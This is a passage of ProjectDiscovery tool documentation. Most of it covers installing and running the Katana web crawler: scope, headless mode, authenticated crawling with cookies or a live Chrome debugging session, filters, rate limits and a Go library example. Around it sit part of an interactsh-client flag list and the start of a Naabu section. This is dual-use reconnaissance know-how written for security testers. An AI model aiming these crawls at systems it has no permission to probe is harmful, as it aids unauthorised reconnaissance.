INPUT:
-s, -server string interactsh server(s) to use (default "oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me")
CONFIG:
-config string flag configuration file (default "$HOME/.config/interactsh-client/config.yaml")
-n, -number int number of interactsh payload to generate (default 1)
-t, -token string authentication token to connect protected interactsh server
-pi, -poll-interval int poll interval in seconds to pull interaction data (default 5)
-nf, -no-http-fallback disable http fallback registration
-cidl, -correlation-id-length int length of the correlation id preamble (default 20)
-cidn, -correlation-id-nonce-length int length of the correlation id nonce (default 13)
-sf, -session-file string store/read from session file
FILTER:
-m, -match string[] match interaction based on the specified pattern
-f, -filter string[] filter interaction based on the specified pattern
-dns-only display only dns interaction in CLI output
-http-only display only http interaction in CLI output
-smtp-only display only smtp interactions in CLI output
UPDATE:
-up, -update update interactsh-client to latest version
-duc, -disable-update-check disable automatic interactsh-client update check
OUTPUT:
-o string output file to write interaction data
-json write output in JSONL(ines) format
-ps, -payload-store enable storing generated interactsh payload to file
-psf, -payload-store-file string store generated interactsh payloads to given file (default "interactsh_payload.txt")
-v display verbose interaction
DEBUG:
-version show version of the project
-health-check, -hc run diagnostic check up
```
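As a quick illustration of combining these flags, the following sketch generates two payloads, restricts CLI output to DNS interactions, and writes JSON lines to a file (the server and file name are examples):
```console
interactsh-client -s oast.me -n 2 -dns-only -json -o interactions.jsonl
```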
# Installing Katana
Learn about how to install Katana
Enter the command below in a terminal to install ProjectDiscovery's Katana using Go.
```bash
go install github.com/projectdiscovery/katana/cmd/katana@latest
```
To install or update Katana using Docker, pull the latest tag.
```bash
docker pull projectdiscovery/katana:latest
```
If you are running Ubuntu, we recommend installing the following prerequisites:
```sh
sudo apt update
sudo snap refresh
sudo apt install zip curl wget git
sudo snap install golang --classic
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
sudo apt update
sudo apt install google-chrome-stable
```
Alternatively, download a prebuilt Katana binary from the GitHub releases page:
```bash
https://github.com/projectdiscovery/katana/releases
```
* Download the latest binary for your OS.
* Unzip the file to run the binary.
## Installation Notes
* Katana requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo 'export PATH=$PATH:$HOME/go/bin' >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/katana`
# Katana Overview
A web crawling framework designed to navigate and parse for hidden details
## What is **Katana?**
Katana is a command-line interface (CLI) web crawling tool written in Golang, designed to be fast, efficient, and provide simple output.
It is designed to crawl websites to gather information and endpoints. One of its defining features is the ability to use headless browsing to crawl applications.
This means that it can crawl single-page applications (SPAs) built using technologies such as JavaScript, Angular, or React to effectively access and gather information from these types of applications.
* Check [out this great ProjectDiscovery blog post](https://blog.projectdiscovery.io/introducing-katana-the-best-cli-web-crawler/) from the initial launch for more information on Katana.
* We also [wrote a great “deep dive” blog](https://blog.projectdiscovery.io/a-deep-dive-on-katana-field-extraction/) on Katana’s field extraction.
## Features and capabilities
* Fast and fully configurable web crawling
* Support for Standard and Headless modes
* JavaScript parsing and crawling support
* Customizable automatic form-filling
* Customizable output through preconfigured fields
* Customizable scope control through preconfigured fields and Regex
* Support Inputs through STDIN, URL, and LIST
* Supported Outputs of STDOUT, FILE, and JSON
## Additional Katana resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://medium.com/@sherlock297/katana-framework-how-to-use-it-to-scan-and-mass-collect-website-data-107f5ae326e0](https://medium.com/@sherlock297/katana-framework-how-to-use-it-to-scan-and-mass-collect-website-data-107f5ae326e0)
* [https://medium.com/@cuncis/katana-an-overview-of-the-powerful-web-application-security-scanner-cheat-sheet-6fc50236aff6](https://medium.com/@cuncis/katana-an-overview-of-the-powerful-web-application-security-scanner-cheat-sheet-6fc50236aff6)
* [https://www.geeksforgeeks.org/katana-crawling-and-spidering-framework/](https://www.geeksforgeeks.org/katana-crawling-and-spidering-framework/)
## Support
Questions about using Katana? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Katana
Learn about running Katana with examples including commands and output
For all of the flags and options available for Katana be sure to check out the [Usage](/tools/katana/usage) page.
On this page we share examples of Katana with specific flags and goals and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Running Katana
Katana requires a URL or endpoint to crawl and accepts single or multiple inputs.
### Input for katana
A URL can be provided using the `-u` option, and multiple values can be provided as comma-separated input. Similarly, file input is supported using the `-list` option, and piped input (stdin) is also supported.
#### URL Input
```sh
katana -u https://tesla.com
```
#### Multiple URL Input (comma-separated)
```sh
katana -u https://tesla.com,https://google.com
```
#### List Input
```bash
$ cat url_list.txt
https://tesla.com
https://google.com
```
```
katana -list url_list.txt
```
#### STDIN (piped) Input
```sh
echo https://tesla.com | katana
```
```sh
cat domains | httpx | katana
```
Example of running katana -
```console
katana -u https://youtube.com
__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/ v0.0.1
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
https://www.youtube.com/
https://www.youtube.com/about/
https://www.youtube.com/about/press/
https://www.youtube.com/about/copyright/
https://www.youtube.com/t/contact_us/
https://www.youtube.com/creators/
https://www.youtube.com/ads/
https://www.youtube.com/t/terms
https://www.youtube.com/t/privacy
https://www.youtube.com/about/policies/
https://www.youtube.com/howyoutubeworks?utm_campaign=ytgen&utm_source=ythp&utm_medium=LeftNav&utm_content=txt&u=https%3A%2F%2Fwww.youtube.com%2Fhowyoutubeworks%3Futm_source%3Dythp%26utm_medium%3DLeftNav%26utm_campaign%3Dytgen
https://www.youtube.com/new
https://m.youtube.com/
https://www.youtube.com/s/desktop/4965577f/jsbin/desktop_polymer.vflset/desktop_polymer.js
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-home-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/cssbin/www-onepick.css
https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.0Zo5FUcPkCg.L.B1.O/am=gAE/d=0/rs=AGKMywG5nh5Qp-BGPbOaI1evhF5BVGRZGA
https://www.youtube.com/opensearch?locale=en_GB
https://www.youtube.com/manifest.webmanifest
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-watch-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js
https://www.youtube.com/s/desktop/4965577f/jsbin/webcomponents-sd.vflset/webcomponents-sd.js
https://www.youtube.com/s/desktop/4965577f/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/scheduler.vflset/scheduler.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-i18n-constants-en_GB.vflset/www-i18n-constants.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-tampering.vflset/www-tampering.js
https://www.youtube.com/s/desktop/4965577f/jsbin/spf.vflset/spf.js
https://www.youtube.com/s/desktop/4965577f/jsbin/network.vflset/network.js
https://www.youtube.com/howyoutubeworks/
https://www.youtube.com/trends/
https://www.youtube.com/jobs/
https://www.youtube.com/kids/
```
## Crawling Mode
### Standard Mode
Standard crawling mode uses the standard Go HTTP library under the hood to handle HTTP requests and responses. This mode is much faster because it avoids browser overhead. However, it analyzes the HTTP response body as-is, without any JavaScript or DOM rendering, so it can miss endpoints that only appear after the DOM is rendered, or asynchronous endpoint calls that complex web applications make in response to, for example, browser-specific events.
### Headless Mode
Headless mode hooks internal headless calls to handle HTTP requests/responses directly within the browser context. This offers two advantages:
* The HTTP fingerprint (TLS and user agent) fully identifies the client as a legitimate browser
* Better coverage, since endpoints are discovered by analyzing both the standard raw response, as in standard mode, and the browser-rendered response with JavaScript enabled
Headless crawling is optional and can be enabled using `-headless` option.
Here are other headless CLI options -
```console
katana -h headless
Flags:
HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-cdd, -chrome-data-dir string path to store chrome browser data
-scp, -system-chrome-path string use specified chrome browser for headless crawling
-noi, -no-incognito start headless chrome without incognito mode
-cwu, -chrome-ws-url string use chrome browser instance launched elsewhere with the debugger listening at this URL
-xhr, -xhr-extraction extract xhr requests
```
### `-no-sandbox`
***
Runs the headless Chrome browser with the **no-sandbox** option, useful when running as the root user.
```console
katana -u https://tesla.com -headless -no-sandbox
```
### *`-no-incognito`*
***
Runs the headless Chrome browser without incognito mode, useful when using the local browser.
```console
katana -u https://tesla.com -headless -no-incognito
```
### *`-headless-options`*
***
When crawling in headless mode, additional chrome options can be specified using `-headless-options`, for example -
```console
katana -u https://tesla.com -headless -system-chrome -headless-options --disable-gpu,proxy-server=http://127.0.0.1:8080
```
## Scope Control
Crawling can be endless if not scoped; katana therefore comes with multiple options to define the crawl scope.
### *`-field-scope`*
***
The handiest option to define scope is with a predefined field name, `rdn` being the default option for field scope.
* `rdn` - crawling scoped to root domain name and all subdomains (e.g. `*example.com`) (default)
* `fqdn` - crawling scoped to given sub(domain) (e.g. `www.example.com` or `api.example.com`)
* `dn` - crawling scoped to domain name keyword (e.g. `example`)
```console
katana -u https://tesla.com -fs dn
```
### *`-crawl-scope`*
***
For advanced scope control, the `-cs` option can be used, which comes with **regex** support.
```console
katana -u https://tesla.com -cs login
```
For multiple in-scope rules, file input with multiline strings / regexes can be passed.
```bash
$ cat in_scope.txt
login/
admin/
app/
wordpress/
```
```console
katana -u https://tesla.com -cs in_scope.txt
```
### *`-crawl-out-scope`*
***
To define what not to crawl, the `-cos` option can be used, which also supports **regex** input.
```console
katana -u https://tesla.com -cos logout
```
For multiple out-of-scope rules, file input with multiline strings / regexes can be passed.
```bash
$ cat out_of_scope.txt
/logout
/log_out
```
```console
katana -u https://tesla.com -cos out_of_scope.txt
```
### *`-no-scope`*
***
Katana defaults to a scope of `*.domain`; the `-ns` option can be used to disable this, including to crawl the internet at large.
```console
katana -u https://tesla.com -ns
```
### *`-display-out-scope`*
***
By default, when a scope option is used it also applies to the links displayed as output; as such, **external URLs are excluded by default**. To override this behavior, the `-do` option can be used to display all external URLs found on in-scope URLs / endpoints.
```
katana -u https://tesla.com -do
```
Here are all the CLI options for scope control -
```console
katana -h scope
Flags:
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
```
## Crawler Configuration
Katana comes with multiple options to configure and control the crawl the way we want.
### *`-depth`*
***
Option to define the `depth` to follow for crawling URLs; the greater the depth, the more endpoints crawled and the longer the crawl takes.
```
katana -u https://tesla.com -d 5
```
### *`-js-crawl`*
***
Option to enable JavaScript file parsing and crawling of the endpoints discovered in JavaScript files; disabled by default.
```
katana -u https://tesla.com -jc
```
### *`-crawl-duration`*
***
Option to predefine the crawl duration; disabled by default.
```
katana -u https://tesla.com -ct 2
```
### *`-known-files`*
***
Option to enable crawling of the `robots.txt` and `sitemap.xml` files; disabled by default.
```
katana -u https://tesla.com -kf robotstxt,sitemapxml
```
### *`-automatic-form-fill`*
***
Option to enable automatic form filling for known / unknown fields; known field values can be customized as needed by updating the form config file at `$HOME/.config/katana/form-config.yaml`.
Automatic form filling is an experimental feature.
```
katana -u https://tesla.com -aff
```
## Authenticated Crawling
Authenticated crawling involves including custom headers or cookies in HTTP requests to access protected resources. These headers provide authentication or authorization information, allowing you to crawl authenticated content / endpoints. You can specify headers directly on the command line or provide them as a file to katana to perform authenticated crawling.
> **Note**: The user needs to perform the authentication manually and export the session cookie / header to a file for use with katana.
### *`-headers`*
***
Option to add a custom header or cookie to the request.
> Syntax of [headers](https://datatracker.ietf.org/doc/html/rfc7230#section-3.2) in the HTTP specification
Here is an example of adding a cookie to the request:
```
katana -u https://tesla.com -H 'Cookie: usrsess=AmljNrESo'
```
It is also possible to supply headers or cookies as a file. For example:
```
$ cat cookie.txt
Cookie: PHPSESSIONID=XXXXXXXXX
X-API-KEY: XXXXX
TOKEN=XX
```
```
katana -u https://tesla.com -H cookie.txt
```
There are more options to configure when needed; here are all the config-related CLI options -
```console
katana -h config
Flags:
CONFIGURATION:
-r, -resolvers string[] list of custom resolver (file or comma separated)
-d, -depth int maximum depth to crawl (default 3)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-ct, -crawl-duration int maximum duration to crawl the target for
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 9223372036854775807)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable automatic form filling (experimental)
-fx, -form-extraction enable extraction of form, input, textarea & select elements
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in request
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file
-flc, -field-config string path to custom field configuration file
-s, -strategy string Visit strategy (depth-first, breadth-first) (default "depth-first")
```
## Connecting to Active Browser Session
Katana can also connect to an active browser session where the user is already logged in and authenticated, and use it for crawling. The only requirement for this is to start the browser with remote debugging enabled.
Here is an example of starting chrome browser with remote debugging enabled and using it with katana -
**Step 1) Locate the path of the Chrome executable**
| Operating System | Chromium Executable Location | Google Chrome Executable Location |
| ---------------- | --------------------------------------------------------------- | -------------------------------------------------------------- |
| Windows (64-bit) | `C:\Program Files (x86)\Google\Chromium\Application\chrome.exe` | `C:\Program Files (x86)\Google\Chrome\Application\chrome.exe` |
| Windows (32-bit) | `C:\Program Files\Google\Chromium\Application\chrome.exe` | `C:\Program Files\Google\Chrome\Application\chrome.exe` |
| macOS | `/Applications/Chromium.app/Contents/MacOS/Chromium` | `/Applications/Google Chrome.app/Contents/MacOS/Google Chrome` |
| Linux | `/usr/bin/chromium` | `/usr/bin/google-chrome` |
**Step 2) Start Chrome with remote debugging enabled; it will return a websocket URL. For example, on macOS, you can start Chrome with remote debugging enabled using the following command** -
```console
$ /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222
DevTools listening on ws://127.0.0.1:9222/devtools/browser/c5316c9c-19d6-42dc-847a-41d1aeebf7d6
```
> Now login to the website you want to crawl and keep the browser open.
**Step 3) Use the websocket URL with katana to connect to the active browser session and crawl the website**
```console
katana -headless -u https://tesla.com -cwu ws://127.0.0.1:9222/devtools/browser/c5316c9c-19d6-42dc-847a-41d1aeebf7d6 -no-incognito
```
> **Note**: You can use the `-cdd` option to specify a custom Chrome data directory to store browser data and cookies, but that does not save session data if the cookie is set to `Session` only or expires after a certain time.
## Filters
### *`-field`*
***
Katana comes with built-in fields that can be used to filter the output for the desired information; the `-f` option can be used to specify any of the available fields.
```
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
```
Here is a table with examples of each field and expected output when used -
| FIELD | DESCRIPTION | EXAMPLE |
| ------- | --------------------------- | ----------------------------------------------------------------------------- |
| `url` | URL Endpoint | `https://admin.projectdiscovery.io/admin/login?user=admin&password=admin` |
| `qurl` | URL including query param | `https://admin.projectdiscovery.io/admin/login.php?user=admin&password=admin` |
| `qpath` | Path including query param | `/login?user=admin&password=admin` |
| `path` | URL Path | `https://admin.projectdiscovery.io/admin/login` |
| `fqdn` | Fully Qualified Domain name | `admin.projectdiscovery.io` |
| `rdn` | Root Domain name | `projectdiscovery.io` |
| `rurl` | Root URL | `https://admin.projectdiscovery.io` |
| `ufile` | URL with File | `https://admin.projectdiscovery.io/login.js` |
| `file` | Filename in URL | `login.php` |
| `key` | Parameter keys in URL | `user,password` |
| `value` | Parameter values in URL | `admin,admin` |
| `kv` | Keys=Values in URL | `user=admin&password=admin` |
| `dir` | URL Directory name | `/admin/` |
| `udir` | URL with Directory | `https://admin.projectdiscovery.io/admin/` |
Here is an example of using the field option to display only the URLs with query parameters in them -
```
katana -u https://tesla.com -f qurl -silent
https://shop.tesla.com/en_au?redirect=no
https://shop.tesla.com/en_nz?redirect=no
https://shop.tesla.com/product/men_s-raven-lightweight-zip-up-bomber-jacket?sku=1740250-00-A
https://shop.tesla.com/product/tesla-shop-gift-card?sku=1767247-00-A
https://shop.tesla.com/product/men_s-chill-crew-neck-sweatshirt?sku=1740176-00-A
https://www.tesla.com/about?redirect=no
https://www.tesla.com/about/legal?redirect=no
https://www.tesla.com/findus/list?redirect=no
```
### Custom Fields
You can create custom fields to extract and store specific information from page responses using regex rules. These custom fields are defined using a YAML config file and are loaded from the default location at `$HOME/.config/katana/field-config.yaml`. Alternatively, you can use the `-flc` option to load a custom field config file from a different location.
Here is example custom field.
```yaml
- name: email
type: regex
regex:
- '([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
- '([a-zA-Z0-9+._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
- name: phone
type: regex
regex:
- '\d{3}-\d{8}|\d{4}-\d{7}'
```
When defining custom fields, the following attributes are supported:
* **name** (required)
> The value of the **name** attribute is used as the `-field` CLI option value.
* **type** (required)
> The type of the custom attribute; currently the supported option is `regex`.
* **part** (optional)
> The part of the response to extract the information from. The default value is `response`, which includes both the header and body. Other possible values are `header` and `body`.
* **group** (optional)
> You can use this attribute to select a specific matched group in the regex, for example: `group: 1`
#### Running katana using custom field:
```console
katana -u https://tesla.com -f email,phone
```
### *`-store-field`*
***
To complement the `field` option, which is useful for filtering output at run time, there is the `-sf, -store-fields` option, which works exactly like the `field` option except that, instead of filtering, it stores all the information on disk under a `katana_field` directory, sorted by target URL.
```
katana -u https://tesla.com -sf key,fqdn,qurl -silent
```
```bash
$ ls katana_field/
https_www.tesla.com_fqdn.txt
https_www.tesla.com_key.txt
https_www.tesla.com_qurl.txt
```
The `-store-field` option can be useful for collecting information to build a targeted wordlist for various purposes, including but not limited to:
* Identifying the most commonly used parameters
* Discovering frequently used paths
* Finding commonly used files
* Identifying related or unknown subdomains
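For example, here is a minimal sketch (assuming the stored `key` files contain comma- or newline-separated parameter names) that turns the stored fields into a frequency-sorted parameter wordlist:
```sh
# split stored parameter keys onto separate lines, count occurrences, emit most common first
cat katana_field/*_key.txt | tr ',' '\n' | sort | uniq -c | sort -rn | awk '{print $2}' > params_wordlist.txt
```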
## Katana Filters
### *`-extension-match`*
***
Crawl output can easily be matched for specific extensions using the `-em` option, which ensures only output containing the given extensions is displayed.
```
katana -u https://tesla.com -silent -em js,jsp,json
```
### *`-extension-filter`*
***
Crawl output can easily be filtered for specific extensions using the `-ef` option, which removes all URLs containing the given extensions.
```
katana -u https://tesla.com -silent -ef css,txt,md
```
### *`-match-regex`*
***
The `-match-regex` or `-mr` flag allows you to filter output URLs using regular expressions. When using this flag, only URLs that match the specified regular expression will be printed in the output.
```
katana -u https://tesla.com -mr 'https://shop\.tesla\.com/*' -silent
```
### *`-filter-regex`*
***
The `-filter-regex` or `-fr` flag allows you to filter output URLs using regular expressions. When using this flag, URLs that match the specified regular expression will be skipped.
```
katana -u https://tesla.com -fr 'https://www\.tesla\.com/*' -silent
```
### Advanced Filtering
Katana supports DSL-based expressions for advanced matching and filtering capabilities:
* To match endpoints with a 200 status code:
```shell
katana -u https://www.hackerone.com -mdc 'status_code == 200'
```
* To match endpoints that contain "default" and have a status code other than 403:
```shell
katana -u https://www.hackerone.com -mdc 'contains(endpoint, "default") && status_code != 403'
```
* To match endpoints with PHP technologies:
```shell
katana -u https://www.hackerone.com -mdc 'contains(to_lower(technologies), "php")'
```
* To filter out endpoints running on Cloudflare:
```shell
katana -u https://www.hackerone.com -fdc 'contains(to_lower(technologies), "cloudflare")'
```
DSL functions can be applied to any keys in the jsonl output. For more information on available DSL functions, please visit the [dsl project](https://github.com/projectdiscovery/dsl).
Here are additional filter options -
```console
katana -h filter
Flags:
FILTER:
-mr, -match-regex string[] regex or list of regex to match on output url (cli, file)
-fr, -filter-regex string[] regex or list of regex to filter on output url (cli, file)
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)
-mdc, -match-condition string match response with dsl based condition
-fdc, -filter-condition string filter response with dsl based condition
```
## Rate Limit
It's easy to get blocked / banned while crawling if you don't respect the target website's limits; katana comes with multiple options to tune the crawl to go as fast or as slow as we want.
### *`-delay`*
***
Option to introduce a delay in seconds between each new request katana makes while crawling; disabled by default.
```
katana -u https://tesla.com -delay 20
```
### *`-concurrency`*
***
Option to control the number of URLs per target to fetch at the same time.
```
katana -u https://tesla.com -c 20
```
### *`-parallelism`*
***
Option to define the number of targets to process at the same time from list input.
```
katana -u https://tesla.com -p 20
```
### *`-rate-limit`*
***
Option to define the maximum number of requests that can go out per second.
```
katana -u https://tesla.com -rl 100
```
### *`-rate-limit-minute`*
***
Option to define the maximum number of requests that can go out per minute.
```
katana -u https://tesla.com -rlm 500
```
Here are all the long / short CLI options for rate-limit control -
```console
katana -h rate-limit
Flags:
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
```
## Output
Katana supports file output in both plain text and JSON formats; the JSON output includes additional information such as the `source`, `tag`, and `attribute` name to correlate the discovered endpoint.
### *`-output`*
By default, katana outputs the crawled endpoints in plain text format. The results can be written to a file by using the `-output` option.
```console
katana -u https://example.com -no-scope -output example_endpoints.txt
```
### *`-jsonl`*
***
```console
katana -u https://example.com -jsonl | jq .
```
```json
{
"timestamp": "2023-03-20T16:23:58.027559+05:30",
"request": {
"method": "GET",
"endpoint": "https://example.com",
"raw": "GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nAccept-Encoding: gzip\r\n\r\n"
},
"response": {
"status_code": 200,
"headers": {
"accept_ranges": "bytes",
"expires": "Mon, 27 Mar 2023 10:53:58 GMT",
"last_modified": "Thu, 17 Oct 2019 07:18:26 GMT",
"content_type": "text/html; charset=UTF-8",
"server": "ECS (dcb/7EA3)",
"vary": "Accept-Encoding",
"etag": "\"3147526947\"",
"cache_control": "max-age=604800",
"x_cache": "HIT",
"date": "Mon, 20 Mar 2023 10:53:58 GMT",
"age": "331239"
},
"body": "\n\n\n Example Domain\n\n \n \n \n \n\n\n\n
\n
Example Domain
\n
This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.
This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.
\n\n\n"
}
}
```
### *`-store-response`*
***
The `-store-response` option allows for writing all crawled endpoint requests and responses to a text file. When this option is used, text files including the request and response will be written to the **katana\_response** directory. If you would like to specify a custom directory, you can use the `-store-response-dir` option.
```console
katana -u https://example.com -no-scope -store-response
```
```bash
$ cat katana_response/index.txt
katana_response/example.com/327c3fda87ce286848a574982ddd0b7c7487f816.txt https://example.com (200 OK)
katana_response/www.iana.org/bfc096e6dd93b993ca8918bf4c08fdc707a70723.txt http://www.iana.org/domains/reserved (200 OK)
```
**Note:** *The `-store-response` option is not supported in `-headless` mode.*
Here are additional CLI options related to output -
```console
katana -h output
OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-j, -json write output in JSONL(ines) format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-version display project version
```
## Katana as a library
`katana` can be used as a library by creating an instance of the `Options` struct and populating it with the same options that would be specified via the CLI. Using the options you can create `crawlerOptions` and then a standard or hybrid `crawler`.
The `crawler.Crawl` method should be called to crawl the input.
```go
package main
import (
"math"
"github.com/projectdiscovery/gologger"
"github.com/projectdiscovery/katana/pkg/engine/standard"
"github.com/projectdiscovery/katana/pkg/output"
"github.com/projectdiscovery/katana/pkg/types"
)
func main() {
options := &types.Options{
MaxDepth: 3, // Maximum depth to crawl
FieldScope: "rdn", // Crawling Scope Field
BodyReadSize: math.MaxInt, // Maximum response size to read
Timeout: 10, // Timeout is the time to wait for request in seconds
Concurrency: 10, // Concurrency is the number of concurrent crawling goroutines
Parallelism: 10, // Parallelism is the number of urls processing goroutines
Delay: 0, // Delay is the delay between each crawl requests in seconds
RateLimit: 150, // Maximum requests to send per second
Strategy: "depth-first", // Visit strategy (depth-first, breadth-first)
OnResult: func(result output.Result) { // Callback function to execute for result
gologger.Info().Msg(result.Request.URL)
},
}
crawlerOptions, err := types.NewCrawlerOptions(options)
if err != nil {
gologger.Fatal().Msg(err.Error())
}
defer crawlerOptions.Close()
crawler, err := standard.New(crawlerOptions)
if err != nil {
gologger.Fatal().Msg(err.Error())
}
defer crawler.Close()
var input = "https://www.hackerone.com"
err = crawler.Crawl(input)
if err != nil {
gologger.Warning().Msgf("Could not crawl %s: %s", input, err.Error())
}
}
```
# Katana Usage
Review Katana usage including flags, configs, and options
## Access help
Use `katana -h` to display all help options.
## Katana help options
```
Flags:
INPUT:
-u, -list string[] target url / list to crawl
CONFIGURATION:
-r, -resolvers string[] list of custom resolver (file or comma separated)
-d, -depth int maximum depth to crawl (default 3)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-jsl, -jsluice enable jsluice parsing in javascript file (memory intensive)
-ct, -crawl-duration value maximum duration to crawl the target for (s, m, h, d) (default s)
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 9223372036854775807)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable automatic form filling (experimental)
-fx, -form-extraction extract form, input, textarea & select elements in jsonl output
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in all http request in header:value format (file)
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file
-flc, -field-config string path to custom field configuration file
-s, -strategy string Visit strategy (depth-first, breadth-first) (default "depth-first")
-iqp, -ignore-query-params Ignore crawling same path with different query-param values
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
DEBUG:
-health-check, -hc run diagnostic check up
-elog, -error-log string file to write sent requests error log
HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-cdd, -chrome-data-dir string path to store chrome browser data
-scp, -system-chrome-path string use specified chrome browser for headless crawling
-noi, -no-incognito start headless chrome without incognito mode
-cwu, -chrome-ws-url string use chrome browser instance launched elsewhere with the debugger listening at this URL
-xhr, -xhr-extraction extract xhr request url,method in jsonl output
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) or custom regex (e.g., '(company-staging.io|company.com)') (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
FILTER:
-mr, -match-regex string[] regex or list of regex to match on output url (cli, file)
-fr, -filter-regex string[] regex or list of regex to filter on output url (cli, file)
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)
-mdc, -match-condition string match response with dsl based condition
-fdc, -filter-condition string filter response with dsl based condition
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
UPDATE:
-up, -update update katana to latest version
-duc, -disable-update-check disable automatic katana update check
OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-or, -omit-raw omit raw requests/responses from jsonl output
-ob, -omit-body omit response body from jsonl output
-j, -jsonl write output in jsonl format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-debug display debug output
-version display project version
```
# Installing Naabu
Learn about how to install Naabu and get started
Enter the command below in a terminal to install ProjectDiscovery's Naabu using Go.
```bash
